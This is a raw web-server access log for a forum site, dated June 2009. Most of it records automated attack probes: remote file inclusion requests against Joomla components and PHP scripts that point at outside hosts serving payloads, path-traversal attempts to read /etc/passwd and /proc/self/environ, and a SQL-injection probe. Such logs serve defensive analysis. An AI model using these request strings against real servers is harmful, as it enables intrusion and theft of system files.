218.150.78.245 - - [29/Jun/2009:05:52:27 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.150.78.245 - - [29/Jun/2009:05:52:27 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.150.78.245 - - [29/Jun/2009:05:52:28 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
213.251.168.157 - - [29/Jun/2009:05:53:16 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 5085 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [29/Jun/2009:05:53:16 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 934 "-" "libwww-perl/5.805" "www.collegiateforum.org"
218.150.78.245 - - [29/Jun/2009:05:54:09 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
213.251.168.157 - - [29/Jun/2009:05:54:35 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 5085 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [29/Jun/2009:05:54:35 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 934 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [29/Jun/2009:05:54:58 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 5085 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [29/Jun/2009:05:54:59 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.0" 200 918 "-" "libwww-perl/5.805" "www.collegiateforum.org"
150.214.108.8 - - [29/Jun/2009:05:55:26 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.0" 200 5069 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [29/Jun/2009:05:55:46 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 934 "-" "libwww-perl/5.803" "www.collegiateforum.org"
123.143.98.5 - - [29/Jun/2009:05:56:17 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
123.143.98.5 - - [29/Jun/2009:05:56:17 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
123.143.98.5 - - [29/Jun/2009:05:56:17 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:05:56:23 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:05:56:23 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:05:56:23 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
218.150.78.245 - - [29/Jun/2009:05:56:30 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.150.78.245 - - [29/Jun/2009:05:56:30 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.150.78.245 - - [29/Jun/2009:05:56:30 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:05:57:44 -0700] "GET /logs/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:05:57:44 -0700] "GET /includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:05:57:44 -0700] "GET /logs/access.log/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
67.225.180.4 - - [29/Jun/2009:05:58:19 -0700] "GET /logs/access.log/index.php?log=' HTTP/1.1" 404 275 "-" "libwww-perl/5.824" "collegiateforum.org"
67.225.180.4 - - [29/Jun/2009:05:58:19 -0700] "GET /index.php?log=' HTTP/1.1" 404 275 "-" "libwww-perl/5.824" "collegiateforum.org"
67.225.180.4 - - [29/Jun/2009:05:58:20 -0700] "GET /logs/index.php?log=' HTTP/1.1" 404 275 "-" "libwww-perl/5.824" "collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:05:59:51 -0700] "GET /logs/access.log%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:00:37 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:00:37 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:00:37 -0700] "GET /logs/access.log%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:00:40 -0700] "GET /administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:00:40 -0700] "GET /logs/access.log%20/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:00:40 -0700] "GET /logs/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:06:01:01 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:06:01:01 -0700] "GET /logs/access_090330.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:06:01:01 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
163.20.160.14 - - [29/Jun/2009:06:01:49 -0700] "GET /logs/access_081208.log//?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
163.20.160.14 - - [29/Jun/2009:06:01:49 -0700] "GET /?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "www.collegiateforum.org"
163.20.160.14 - - [29/Jun/2009:06:01:49 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:02:15 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:02:15 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "collegiateforum.org"
91.195.13.162 - - [29/Jun/2009:06:03:55 -0700] "GET /advertising.php HTTP/1.0" 404 275 "http://www.collegiateforum.org/advertising.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.collegiateforum.org"
65.55.106.238 - - [29/Jun/2009:06:04:25 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:06:04:27 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:06:04:27 -0700] "GET /logs/access_090330.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:06:04:27 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:06:05:40 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:06:05:55 -0700] "GET /logs/access_090330.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:06:05:55 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:06:05:55 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:06:06:08 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:06:06:08 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
123.143.98.5 - - [29/Jun/2009:06:06:42 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
123.143.98.5 - - [29/Jun/2009:06:06:42 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
123.143.98.5 - - [29/Jun/2009:06:06:42 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.68.2.99 - - [29/Jun/2009:06:08:37 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
163.20.160.14 - - [29/Jun/2009:06:10:00 -0700] "GET /logs/access_081208.log%20%20//?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:06:12:18 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
219.94.194.231 - - [29/Jun/2009:06:14:12 -0700] "GET /facileforms.frame.php?ff_compath=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.collegiateforum.org"
219.94.194.231 - - [29/Jun/2009:06:14:12 -0700] "GET /logs//facileforms.frame.php?ff_compath=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.collegiateforum.org"
219.94.194.231 - - [29/Jun/2009:06:14:13 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.collegiateforum.org"
219.94.194.231 - - [29/Jun/2009:06:14:13 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.collegiateforum.org"
219.94.194.231 - - [29/Jun/2009:06:14:13 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
219.94.194.231 - - [29/Jun/2009:06:14:13 -0700] "GET /logs//facileforms.frame.php?ff_compath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
219.94.194.231 - - [29/Jun/2009:06:14:14 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
219.94.194.231 - - [29/Jun/2009:06:14:14 -0700] "GET /logs//facileforms.frame.php?ff_compath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:06:14:33 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
203.241.231.63 - - [29/Jun/2009:06:16:47 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
203.241.231.63 - - [29/Jun/2009:06:16:47 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
203.241.231.63 - - [29/Jun/2009:06:16:47 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
150.214.108.8 - - [29/Jun/2009:06:18:50 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 5085 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [29/Jun/2009:06:20:36 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 934 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [29/Jun/2009:06:21:01 -0700] "GET /?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 934 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [29/Jun/2009:06:21:20 -0700] "GET /logs/?sourcedir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 200 5085 "-" "libwww-perl/5.803" "www.collegiateforum.org"
210.220.213.203 - - [29/Jun/2009:06:25:51 -0700] "GET /logs/access.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
210.220.213.203 - - [29/Jun/2009:06:25:51 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
210.220.213.203 - - [29/Jun/2009:06:25:51 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:29:47 -0700] "GET /logs/shop.php/?commonpath=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:29:47 -0700] "GET /shop.php/?commonpath=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
124.0.103.194 - - [29/Jun/2009:06:30:53 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.0.103.194 - - [29/Jun/2009:06:30:53 -0700] "GET /logs/access.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.0.103.194 - - [29/Jun/2009:06:30:53 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:31:40 -0700] "GET /logs/access.log/shop.php/?commonpath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:31:40 -0700] "GET /shop.php/?commonpath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:31:40 -0700] "GET /logs/shop.php/?commonpath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:32:01 -0700] "GET /shop.php/?commonpath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:32:01 -0700] "GET /logs/shop.php/?commonpath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:32:01 -0700] "GET /logs/access.log/shop.php/?commonpath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [29/Jun/2009:06:37:15 -0700] "GET /logs/access.log/shop.php/?commonpath=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
124.0.103.194 - - [29/Jun/2009:06:40:28 -0700] "GET /logs/access.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
89.186.1.54 - - [29/Jun/2009:06:42:14 -0700] "GET /logs//atom.php5?page=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
89.186.1.54 - - [29/Jun/2009:06:42:14 -0700] "GET /atom.php5?page=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
89.186.1.54 - - [29/Jun/2009:06:43:17 -0700] "GET /logs/access_081208.log//atom.php5?page=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
89.186.1.54 - - [29/Jun/2009:06:43:20 -0700] "GET /logs/access.log//atom.php5?page=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
174.132.242.42 - - [29/Jun/2009:06:44:17 -0700] "GET / HTTP/1.1" 200 934 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "www.collegiateforum.org"
72.82.228.83 - - [29/Jun/2009:06:48:16 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
72.82.228.83 - - [29/Jun/2009:06:48:16 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
72.82.228.83 - - [29/Jun/2009:06:48:16 -0700] "GET /phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:06:50:31 -0700] "GET /logs/access.log/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.0.103.194 - - [29/Jun/2009:06:51:36 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
124.0.103.194 - - [29/Jun/2009:06:51:36 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
124.0.103.194 - - [29/Jun/2009:06:51:39 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
72.82.228.83 - - [29/Jun/2009:06:51:49 -0700] "GET /phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
72.82.228.83 - - [29/Jun/2009:06:51:49 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
72.82.228.83 - - [29/Jun/2009:06:51:49 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
72.82.228.83 - - [29/Jun/2009:06:52:27 -0700] "GE